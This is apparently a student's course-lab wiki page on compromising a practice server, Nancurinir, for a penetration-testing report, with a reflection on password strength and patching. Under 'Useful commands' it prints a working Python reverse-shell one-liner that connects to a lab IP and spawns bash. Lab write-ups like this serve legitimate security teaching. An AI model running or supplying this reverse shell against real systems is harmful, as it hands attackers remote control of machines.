Lab 10.2 - Adam-Hachem/SEC335 GitHub Wiki
Overview
The goal of this lab was to compromise a server, Nancurinir (lord of the rings reference), and documenting it all in a pentest report as well as provide recommendations for remediation.
Useful commands
I needed to use a python reverse shell to get a terminal that I could sudo from. This was the code I used:
export RHOST="10.0.17.87";export RPORT=4567;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Reflection
In this lab, I showed how crucial it is to have strict rules for passwords and the significance of regularly updating your systems to newer versions. The exploit I used has been patched a long time ago, but that doesn't matter if you don't update. Also, by making it harder to crack credentials, it would have made it more challenging to obtain the root password and establish complete control over the system.